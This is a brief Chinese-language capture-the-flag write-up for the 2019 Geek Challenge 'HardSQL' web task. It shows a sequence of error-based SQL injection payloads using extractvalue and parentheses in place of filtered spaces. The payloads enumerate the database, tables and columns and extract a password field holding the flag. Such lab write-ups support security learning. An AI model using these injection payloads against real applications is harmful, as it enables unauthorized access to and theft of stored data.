[極客大挑戰 2019]HardSQL
阿新 • • 發佈:2021-01-18
技術標籤:web
嘗試了一下發現空格在內的好多東西都被過濾掉了
學到了報錯注入(空格用括號代替)
1'or(extractvalue(1,concat(0x7e,database())))#
得到庫geek
'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#
得到表
'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name) )from(information_schema.columns)where(table_name)like("H4rDsq1")))))#
得到列
'or(extractvalue(1,concat(0x7e,(select(group_concat(password,20))from(H4rDsq1)where(id)like(1)))))#
查內容
只有一半flag,從右顯示得到另一半
'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)where(id)like(1)))))#
拼到一起得到完整flag